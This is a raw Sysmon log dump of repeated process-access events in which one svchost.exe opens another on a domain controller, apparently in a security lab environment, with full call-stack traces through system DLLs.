13:30:11.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.357{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.342{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.326{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.310{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011386Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 